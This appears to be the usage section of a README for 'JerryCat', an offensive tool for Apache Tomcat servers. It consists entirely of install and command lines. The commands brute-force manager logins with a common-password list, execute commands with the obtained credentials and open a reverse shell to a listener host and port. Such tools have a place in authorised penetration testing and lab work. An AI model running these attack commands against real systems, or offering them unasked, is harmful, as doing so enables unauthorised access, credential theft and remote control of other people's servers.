Clone & install dependencies
git clone https://github.com/TheF0rceAwak5ns/JerryCat.git && cd JerryCat && pip install -r requirements.txt
without a user list
python3 jerrycat.py brute http://10.10.10.10:8080/ -P resources/password-list-common-tomcat.txt
with a user list
python3 jerrycat.py brute http://10.10.10.10:8080/ -U /path/to/user/list -P resources/password-list-common-tomcat.txt
python3 jerrycat.py exec http://10.10.10.10:8080/ -u tomcat -p s3cret
python3 jerrycat.py reverse http://10.10.10.10:8080/ -u tomcat -p s3cret --lhost 10.10.10.10 --lport 4444